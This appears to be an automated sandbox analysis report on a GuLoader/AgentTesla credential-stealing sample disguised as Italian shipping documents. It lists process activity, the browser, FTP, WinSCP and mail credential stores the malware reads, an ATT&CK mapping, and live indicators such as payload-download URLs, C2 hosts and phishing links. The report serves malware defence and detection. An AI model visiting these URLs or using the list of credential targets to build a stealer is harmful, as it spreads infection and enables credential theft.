Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (10 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (21 identical entries collapsed)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match | File source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 2124, type: MEMORYSTR
ATT&CK matrix, listed per tactic (numbers in front of a technique name are carried over from the report's matrix as they appear there):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 121 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Software Packing; 1 DLL Side-Loading; Compile After Delivery
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 221 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 124 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1518114 | Sample: Ze1Ueabtx5.img | Startdate: 25/09/2024 | Architecture: WINDOWS | Score: 100

Start node:
  DNS/IP: ftp.concaribe.com; concaribe.com; api.ipify.org
  Signatures: Found malware configuration; Antivirus detection for URL or domain; Yara detected GuLoader; 5 other signatures
  Started: Documenti di spedizione 0009333000459595995.exe (graph counters: 1 23); cmd.exe (graph counters: 2)

Documenti di spedizione 0009333000459595995.exe:
  Dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32
  Started: powershell.exe (graph counters: 19)

cmd.exe:
  Started: powershell.exe (graph counters: 41); conhost.exe

powershell.exe (started by Documenti di spedizione 0009333000459595995.exe):
  Dropped: Documenti di spedi...333000459595995.exe, PE32
  Signatures: Writes to foreign memory regions
  Started: wabmig.exe (graph counters: 15 8); conhost.exe

powershell.exe (started by cmd.exe):
  Dropped: Documenti di spedi...333000459595995.exe, PE32
  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module; Powershell drops PE file

wabmig.exe:
  DNS/IP: concaribe.com 192.185.13.234, 21, 49739 UNIFIEDLAYER-AS-1US United States; 185.29.11.53, 49737, 80 DATACLUB-NL European Union; api.ipify.org 172.67.74.152, 443, 49738 CLOUDFLARENETUS United States
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner
Ze1Ueabtx5.img | 5% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe | 8% | ReversingLabs
\Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | 8% | ReversingLabs

No Antivirus matches
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://185.29.11.53/bIGuEflfnZjESw74.binf;c | 0% | Avira URL Cloud | safe
http://crl.micro | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://ftp.concaribe.com | 100% | Avira URL Cloud | malware
http://185.29.11.53/bIGuEflfnZjESw74.bin | 0% | Avira URL Cloud | safe
https://api.ipify.org/t | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
http://concaribe.com | 0% | Avira URL Cloud | safe
http://185.29.11.53/bIGuEflfnZjESw74.binj;W | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 172.67.74.152 | true | false | - | unknown
concaribe.com | 192.185.13.234 | true | true | - | unknown
ftp.concaribe.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
http://185.29.11.53/bIGuEflfnZjESw74.bin | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.11.53/bIGuEflfnZjESw74.binf;c | wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000006.00000002.2460083974.00000000031B8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ftp.concaribe.com | wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | Documenti di spedizione 0009333000459595995.exe, 00000005.00000002.1792758613.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Documenti di spedizione 0009333000459595995.exe, 00000005.00000000.1768071577.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ze1Ueabtx5.img, Documenti di spedizione 0009333000459595995.exe.2.dr, Documenti di spedizione 0009333000459595995.exe.6.dr | false | URL Reputation: safe | unknown
http://concaribe.com | wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.29.11.53/bIGuEflfnZjESw74.binj;W | wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.29.11.53 | unknown | European Union | 203557 | DATACLUB-NL | false
192.185.13.234 | concaribe.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518114
Start date and time: 2024-09-25 12:33:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 11
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ze1Ueabtx5.img (renamed because the original name is a hash value)
Original Sample Name: 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown
Detection: MAL
Classification: mal100.troj.spyw.evad.winIMG@10/18@2/3
• Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, SIHClient.exe, conhost.exe, fsdepends.sys
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ze1Ueabtx5.img
Time | Type | Description
06:34:35 | API Interceptor | 67x Sleep call for process: powershell.exe modified
06:35:50 | API Interceptor | 1664x Sleep call for process: wabmig.exe modified
Match (IP) / Associated Sample Name or URL | Detection | Threat Name | Context

Match: 185.29.11.53
  Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 185.29.11.53/bIGuEflfnZjESw74.bin
Match: 192.185.13.234
  draft bl_pdf.vbs | malicious | AgentTesla, GuLoader | concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
Match: 172.67.74.152
  file.exe | malicious | LummaC, Vidar | api.ipify.org/
  file.exe | malicious | LummaC, Vidar | api.ipify.org/
  file.exe | malicious | LummaC, Vidar | api.ipify.org/
  file.exe | malicious | LummaC, Vidar | api.ipify.org/
  file.exe | malicious | Unknown | api.ipify.org/
  file.exe | malicious | LummaC, Vidar | api.ipify.org/
  file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
  file.exe | malicious | Unknown | api.ipify.org/
  zE7Ken4cFt.dll | malicious | Quasar | api.ipify.org/
  FormPlayer.exe | malicious | Unknown | api.ipify.org/
Match (domain) / Associated Sample Name or URL | Detection | Threat Name | Context

Match: api.ipify.org
  Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
  rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla | 104.26.13.205
  https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 104.26.13.205
  Zoom_Invite.call-660194855683.wsf | malicious | XWorm | 104.26.12.205
  reported_account_violation-pdf-67223451.wsf | malicious | XWorm | 104.26.13.205
  COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla | 104.26.12.205
  http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.html | malicious | Greatness Phishing Kit, HTMLPhisher | 104.26.12.205
  http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.html | malicious | Greatness Phishing Kit, HTMLPhisher | 104.26.13.205
  http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.html | malicious | Greatness Phishing Kit, HTMLPhisher | 172.67.74.152
  http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.html | malicious | Greatness Phishing Kit, HTMLPhisher | 172.67.74.152
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
DATACLUB-NL
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 185.29.11.53
  PO 00009876660887666000.bat.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 84.38.133.121
  Bankcopyscanneddoc.exe | Get hash | malicious | RedLine | Browse | 84.38.129.21
  xCjIO3SCur0S.exe | Get hash | malicious | Remcos | Browse | 185.29.11.23
  new.cmd | Get hash | malicious | GuLoader | Browse | 185.29.11.28
  temp.cmd | Get hash | malicious | Unknown | Browse | 185.29.11.28
  price_request_.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 185.29.11.62
  disprovable.dll | Get hash | malicious | CryptOne, Qbot | Browse | 84.38.133.191
  BL.xls | Get hash | malicious | Lokibot | Browse | 84.38.129.114
  kej177el6.dll | Get hash | malicious | Qbot | Browse | 84.38.133.191
UNIFIEDLAYER-AS-1US
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 192.185.13.234
  Audio_Msg..00290663894983Transcript.html | Get hash | malicious | HTMLPhisher | Browse | 162.215.211.9
  rPO_CW00402902400438.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 162.241.27.20
  Shipping Document.exe | Get hash | malicious | AgentTesla | Browse | 162.214.80.31
  https://wbh.sxx.temporary.site/ | Get hash | malicious | Unknown | Browse | 50.6.160.227
  https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/ | Get hash | malicious | Unknown | Browse | 50.6.153.149
  https://hr.schoolrundriver.com/system/fonts/wordpress/CHASE | Get hash | malicious | Unknown | Browse | 192.232.218.112
  https://rb.gy/5ow3t3 | Get hash | malicious | Unknown | Browse | 50.6.153.151
  https://sjc.hgp.mybluehost.me/binance/bnb/access/account/login.php/ | Get hash | malicious | Unknown | Browse | 50.6.153.107
  http://www.icontci.com.br/ch/Swisscom/Swisscom/Swisscom-login/login/kunden/ | Get hash | malicious | Unknown | Browse | 108.179.253.238
CLOUDFLARENETUS
  GJecwa34.cpl.exe | Get hash | malicious | Unknown | Browse | 1.1.1.1
  rdoc17000320240923070456.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
  John Lorenz-Employee-Benefits.docx | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 104.26.13.205
  John Lorenz-Employee-Benefits.docx | Get hash | malicious | HTMLPhisher | Browse | 188.114.97.3
  BL.xls | Get hash | malicious | Remcos, PureLog Stealer | Browse | 188.114.97.9
  Audio_Msg..00290663894983Transcript.html | Get hash | malicious | HTMLPhisher | Browse | 172.67.143.206
  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=email | Get hash | malicious | HTMLPhisher | Browse | 104.19.148.54
  rPO_CW00402902400438.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
  Contract_Agreement_Tuesday September 2024.pdf | Get hash | malicious | Unknown | Browse | 104.21.90.101
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e
  rdoc17000320240923070456.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | 172.67.74.152
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse | 172.67.74.152
  CCE_000110.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
  CCE_000110.exe | Get hash | malicious | Unknown | Browse | 172.67.74.152
  SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | Get hash | malicious | XWorm | Browse | 172.67.74.152
  https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=email | Get hash | malicious | HTMLPhisher | Browse | 172.67.74.152
  rPO_CW00402902400438.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.74.152
  https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1 | Get hash | malicious | HTMLPhisher | Browse | 172.67.74.152
  rPEDIDO-M456.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.74.152
  rMT103SwiftCopyoFPayment.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse
  4hIPvzV6a2.exe | Get hash | malicious | Unknown | Browse
  SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | Get hash | malicious | Unknown | Browse
  SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | Get hash | malicious | Unknown | Browse
  3Dut8dFCwD.exe | Get hash | malicious | Unknown | Browse
  Ms63nDrOBa.exe | Get hash | malicious | Unknown | Browse
  SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | Get hash | malicious | Unknown | Browse
  SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | Get hash | malicious | Unknown | Browse
  rSCAN31804.exe | Get hash | malicious | GuLoader, Remcos | Browse
  rSCAN31804.exe | Get hash | malicious | GuLoader | Browse
C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
  Documenti di spedizione 0009333000459595995.exe | Get hash | malicious | AgentTesla, GuLoader | Browse
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):8003
                                        Entropy (8bit):4.840877972214509
                                        Encrypted:false
                                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                        MD5:106D01F562D751E62B702803895E93E0
                                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2520
                                        Entropy (8bit):5.3958247593238235
                                        Encrypted:false
